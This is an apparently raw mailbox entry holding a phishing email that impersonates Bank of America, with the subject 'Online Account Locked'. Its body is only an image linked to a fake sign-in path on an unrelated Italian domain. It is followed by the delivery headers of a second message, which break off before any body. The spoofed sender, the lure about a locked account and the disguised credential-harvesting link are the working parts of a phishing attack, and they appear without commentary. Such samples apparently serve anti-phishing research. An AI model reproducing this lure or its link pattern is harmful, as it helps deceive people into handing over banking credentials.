From: "Bank Of America"<me@localhost.com>
Subject: Bank of America Alert: Online Account Locked
Date: Thu, 15 Jan 2015 11:52:56 +0100
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 6

<a href="http://mx1.corrierefranco.it/images/login/secure.bankofamerica.com/signOnScreen.go/sign-in/" target="_blank"><img src="http://5751b4ee.skybroadband.com/Caspod/Database/rere/boza.png" />
</a>

From bounce-2027029_html-83153681-1146070-10860472-0@bounce.vp-email.com  Fri Jan 16 04:00:19 2015
Return-Path: <bounce-2027029_html-83153681-1146070-10860472-0@bounce.vp-email.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id A0F57F40BE
	for <jose@login.monkey.org>; Fri, 16 Jan 2015 04:00:19 -0600 (CST)
Received: from smtpin10.hostedemail.com (10.5.19.251.rfc1918.com [10.5.19.251])
	by ofarelay01.b.hostedemail.com (Postfix) with SMTP id 4F1A634E36A
	for <jose@login.monkey.org>; Fri, 16 Jan 2015 10:00:19 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 69756863358.10.stem16_38272eb875b03
X-Spam-Summary: 1,0,0,,d41d8cd98f00b204,bounce-2027029_html-83153681-1146070-10860472-0@bounce.vp-email.com,:,RULES_HIT,0,RBL:209.43.22.9:@bounce.vp-email.com:.lbl8.mailshell.net-62.18.0.100 64.10.201.10,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0
X-HE-Tag: stem16_38272eb875b03
X-Filterd-Recvd-Size: 10196
Received: from mta9.vp-email.com (mta9.vp-email.com [209.43.22.9])
	by imf23.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri, 16 Jan 2015 09:59:45 +0000 (UTC)
Received: by mta9.vp-email.com id hn3gh2163hsf for <jose@monkey.org>; Fri, 16 Jan 2015 03:44:45 -0600 (envelope-from <bounce-2027029_HTML-83153681-1146070-10860472-0@bounce.vp-email.com>)
